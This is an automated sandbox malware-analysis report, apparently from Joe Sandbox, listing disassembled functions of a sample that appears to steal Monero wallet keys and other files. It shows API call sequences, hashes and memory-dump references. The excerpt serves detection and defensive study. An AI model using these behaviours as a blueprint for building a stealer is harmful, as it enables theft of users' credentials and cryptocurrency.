                              • Instruction ID: 7fa19fdeb50f3b23be41cef036ec6c4535372e794b04b572c6aa3bcf513908d1
                              • Opcode Fuzzy Hash: 7bfa5b057b428917d151e0fde2c9b7a9d64cdd1e42a8bff5c806f988811fb4f8
                              • Instruction Fuzzy Hash: 6D518FB0C042089BDB64EB90DC85BEEB376AF04306F1441ACE90677281EB742E8CCF58
                              Function 00657E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,013CBBE8,00000000,00020119,?), ref: 00657E5E
                              • RegQueryValueExA.ADVAPI32(?,013DDDB8,00000000,00000000,000000FF,000000FF), ref: 00657E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00657E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: edc0e9355bbadd869b9681a5ef815317ced3260a182324d418d1c55275c289f5
                              • Instruction ID: 78eda8a37334b862873b78cfecfc7c76db1ac1cb6cb9cf86c5912191c0ca29c0
                              • Opcode Fuzzy Hash: edc0e9355bbadd869b9681a5ef815317ced3260a182324d418d1c55275c289f5
                              • Instruction Fuzzy Hash: DE119EB1A44305EBE704CF98EC4AFBBBBB9FB04B11F10412AFA05A72C0D77458058BA1
                              Function 00659260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(013DE4F0,?,?,?,0065140C,?,013DE4F0,00000000), ref: 0065926C
                              • lstrcpyn.KERNEL32(0088AB88,013DE4F0,013DE4F0,?,0065140C,?,013DE4F0), ref: 00659290
                              • lstrlen.KERNEL32(?,?,0065140C,?,013DE4F0), ref: 006592A7
                              • wsprintfA.USER32 ref: 006592C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 33cd0c1c2386edc9bcb3fdcc2c509748e939b32325d72a5847ebe5212da4bffb
                              • Instruction ID: 782f419f1a892cc6d2e432f5a1a141ae1fa3c36daea14718a695e1387d46e0c4
                              • Opcode Fuzzy Hash: 33cd0c1c2386edc9bcb3fdcc2c509748e939b32325d72a5847ebe5212da4bffb
                              • Instruction Fuzzy Hash: 0F01D775500208FFDB18DFECC984AAE7BB9FB44361F108149F9098B244C635EA409BA1
                              Function 006412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006412B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006412BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006412D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006412F5
                              • RegCloseKey.ADVAPI32(?), ref: 006412FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 8b87764efed4f6afee4d0c9c513d18778cdbdf02c93c1341dd1ef6585f5a71b3
                              • Instruction ID: f9dd45cdd65ea5f73341b82779ef811b3207e3e04fc6af4624d24fc80803281c
                              • Opcode Fuzzy Hash: 8b87764efed4f6afee4d0c9c513d18778cdbdf02c93c1341dd1ef6585f5a71b3
                              • Instruction Fuzzy Hash: AD0136B5A40208BBEB04DFD4DC49FAEB7B8FB48701F008155FA05D72C0D6759A419F51
                              Function 00656630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00656663
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00656726
                              • ExitProcess.KERNEL32 ref: 00656755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: b019f476dc9c42f4f95bb81afd9c58a00730a63a5ebc894a8267fcf2bd304498
                              • Instruction ID: 3df817b76831eff82836dab288a7c77efd95eddcb8ff2be536532b08fdd80b30
                              • Opcode Fuzzy Hash: b019f476dc9c42f4f95bb81afd9c58a00730a63a5ebc894a8267fcf2bd304498
                              • Instruction Fuzzy Hash: 5E3129B1801218AADB58EB94DC92BDEB779BF04301F404299F60966191DF746B48CF6A
                              Function 006587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00660E28,00000000,?), ref: 0065882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00658836
                              • wsprintfA.USER32 ref: 00658850
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 366f9f57b6716cb827258f5db2595fbcbcfc9661bd3548c1bccbd81bd2b8a9cc
                              • Instruction ID: 7d807cd4f89f69e238bd43faa04e4072df8b8922b0bdc0113da94799f3f9c8ff
                              • Opcode Fuzzy Hash: 366f9f57b6716cb827258f5db2595fbcbcfc9661bd3548c1bccbd81bd2b8a9cc
                              • Instruction Fuzzy Hash: DE2112B1A40204AFEB04DFD8DD45FAEBBB9FB48711F104119FA05A72C0C7799901CBA1
                              Function 00658D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0065951E,00000000), ref: 00658D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00658D62
                              • wsprintfW.USER32 ref: 00658D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: c2f3637451833de76951830408cb0a62c54b59bd5f6721b7b735868c5c817920
                              • Instruction ID: f2d1f5bf35a152fe7a665852ffb711d21566f063a9480d01dffe5161aba88b4d
                              • Opcode Fuzzy Hash: c2f3637451833de76951830408cb0a62c54b59bd5f6721b7b735868c5c817920
                              • Instruction Fuzzy Hash: BFE0E675A40208BBE714DB98DD09E5977B8FB44701F104165FE09972C0D9715E109B66
                              Function 0064A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0064A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0064A6BC
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0064A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 88a6bbbc4557850d61d2c7d114fd0f5411516ebb2aa2c458f88e1253cbd60e43
                              • Instruction ID: ad4b2a9c0c61f5f0e34f1166337f266aa69813c7c2c116ca07243d66781658d8
                              • Opcode Fuzzy Hash: 88a6bbbc4557850d61d2c7d114fd0f5411516ebb2aa2c458f88e1253cbd60e43
                              • Instruction Fuzzy Hash: AFE1ED728101189ADB48EBE4DC92EEE733ABF14301F50825DF91776091EF346A4DCB6A
                              Function 0064D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064D481
                              • lstrlen.KERNEL32(00000000), ref: 0064D698
                              • lstrlen.KERNEL32(00000000), ref: 0064D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0064D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 40f05e29509bbcc6ba7a9083501058a1a3f1a91071bf8aa1f276d669269faa84
                              • Instruction ID: 6a9c7b89227700a38dbb33fae724bb657d6582e4ffd75fe932481da93f09063f
                              • Opcode Fuzzy Hash: 40f05e29509bbcc6ba7a9083501058a1a3f1a91071bf8aa1f276d669269faa84
                              • Instruction Fuzzy Hash: 8A91FD729101189ADB48FBE4DD96DEE733ABF14301F50426DF907A6091EF346A0DCB6A
                              Function 0064D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064D801
                              • lstrlen.KERNEL32(00000000), ref: 0064D99F
                              • lstrlen.KERNEL32(00000000), ref: 0064D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0064DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 77551c2af45d927e575c5fc8d3df6c16ee95b5e39fefa6d80cf98799e2fc74f2
                              • Instruction ID: d3056aafe1bbe6855835f2cefffd59a56b98c901477ce7a11f1b0e9196850c38
                              • Opcode Fuzzy Hash: 77551c2af45d927e575c5fc8d3df6c16ee95b5e39fefa6d80cf98799e2fc74f2
                              • Instruction Fuzzy Hash: D281EC729101189ADB48FBE4DC96DEE733ABF14301F50422DF906A6191EF346A0DCB6A
                              Function 0064F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
